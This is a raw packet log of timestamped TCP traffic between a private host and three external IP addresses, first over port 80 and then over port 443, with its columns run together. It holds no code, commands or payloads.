                                          Oct 24, 2024 08:59:05.176812887 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.176852942 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.177676916 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.177711010 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.177721977 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.177751064 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.182136059 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.182169914 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.182183027 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.182204008 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.182431936 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.182465076 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.182648897 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.182982922 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.183020115 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.292880058 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.292923927 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.292983055 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.293071985 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.293071985 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.293071985 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.293572903 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.293623924 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.298309088 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.298413038 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.298430920 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.298471928 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.299156904 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.299191952 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.299213886 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.299225092 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.299233913 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.299273014 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.303625107 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.303659916 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.303687096 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.303719997 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.304400921 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.304435015 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.304449081 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.304480076 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.308983088 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.309062958 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.309096098 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.309120893 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.309739113 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.309772968 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.309794903 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.309806108 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.309834003 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.309853077 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.314259052 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.314295053 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.314321995 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.314352036 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.334139109 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.334172964 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.334208012 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.334208965 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.334361076 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.334362030 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.410087109 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.410152912 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.410389900 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.410425901 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.410439968 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.410465956 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.410693884 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.410742044 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.410962105 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.411000013 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.411010027 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.411047935 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.411521912 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.411556005 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.411582947 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.411590099 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.411608934 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.411631107 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.412365913 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.412412882 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.412416935 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.412451982 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.412462950 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.412481070 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.412501097 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.412519932 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.413314104 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.413347006 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.413372993 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.413379908 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.413391113 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.413429976 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.414269924 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.414304972 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.414354086 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.414354086 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.450875998 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.450964928 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.450998068 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.451047897 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.493974924 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.494024038 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.494065046 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.494160891 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.494160891 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.495390892 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.527479887 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.527532101 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.527574062 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.527678967 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.527678967 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.527678967 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.527844906 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.527893066 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.528115988 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.528151035 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.528167963 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.528192997 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.528633118 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.528667927 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.528692961 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.528702974 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.528712988 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.528748989 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.529545069 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.529578924 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.529613018 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.529632092 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.529654980 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.530523062 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.530556917 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.530576944 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.530590057 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.530596972 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.530635118 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.531554937 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.531589985 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.531614065 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.531632900 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.567831039 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.567893982 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.567955971 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.567990065 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.568031073 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.610692024 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.610759974 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.610766888 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.610841990 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.610943079 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.612495899 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.644419909 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.644519091 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.644527912 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.644552946 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.644706011 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.644706011 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.644965887 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.644999027 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.645035982 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.645549059 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.645584106 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.645590067 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.645617962 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.645617008 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.645653009 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.646431923 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.646466017 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.646476984 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.646498919 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.646500111 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.646533012 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.647280931 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.647325039 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.647336960 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.647370100 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.647372007 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.647399902 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.647403002 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.647433043 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.648266077 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.648299932 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.648332119 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.648341894 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.648365974 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.649199963 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.649235964 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.649245024 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.649270058 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.687072039 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.687125921 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.687333107 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.687381029 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.727705002 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.727870941 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.727922916 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.727929115 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.727957010 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.728204966 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.728243113 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.761368990 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.761464119 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.761497974 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.761641979 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.761641979 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.762047052 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.762084007 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.762119055 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.762125969 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.762152910 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.762829065 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.762861967 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.762877941 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.762892962 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.763273001 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.763305902 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.763309002 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.763345003 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.763870001 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.763902903 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.763937950 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.763947010 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.763973951 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.764663935 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.764697075 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.764708996 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.764729023 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.764729977 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.764763117 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.765579939 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.765621901 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:07.108670950 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:07.812659025 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:07.812724113 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:07.812798023 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:07.816016912 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:07.816044092 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:08.693137884 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:08.693212032 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:08.694679022 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:08.694736958 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:08.700504065 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:08.700536013 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:08.700965881 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:08.765871048 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:08.807332039 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:09.120867014 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:09.241132021 CEST44349166216.58.212.174192.168.2.22
                                          Oct 24, 2024 08:59:09.241424084 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:09.243572950 CEST49166443192.168.2.22216.58.212.174
                                          Oct 24, 2024 08:59:09.267491102 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:09.267544031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:09.267682076 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:09.267916918 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:09.267934084 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:10.133155107 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:10.133393049 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:10.137042999 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:10.137072086 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:10.137722015 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:10.143009901 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:10.187338114 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.549302101 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.549418926 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.556988001 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.557090044 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.665788889 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.665908098 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.665956974 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.666825056 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.666889906 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.666904926 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.667932987 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.667994022 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.668008089 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.672492027 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.672554016 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.672569036 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.681157112 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.681227922 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.681242943 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.689963102 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.690071106 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.690084934 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.698478937 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.698542118 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.698555946 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.707348108 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.707415104 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.707427979 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.715934038 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.715997934 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.716012001 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.782991886 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.783092976 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.783109903 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.783710003 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.783792973 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.783813953 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.784970045 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.785036087 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.785048962 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.789578915 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.789664030 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.789676905 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.798290968 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.798360109 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.798388004 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.808067083 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.808139086 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.808151960 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.815814018 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.815881968 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.815912008 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.824501991 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.824595928 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.824609041 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.833379984 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.833463907 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.833473921 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.833504915 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.833564997 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.899966002 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.900150061 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.900233030 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.900252104 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.900919914 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.901002884 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.901015997 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.902136087 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.902215004 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.902229071 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.906289101 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.906363010 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.906378031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.915000916 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.915074110 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.915087938 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.925046921 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.925122023 CEST49167443192.168.2.22142.250.186.97
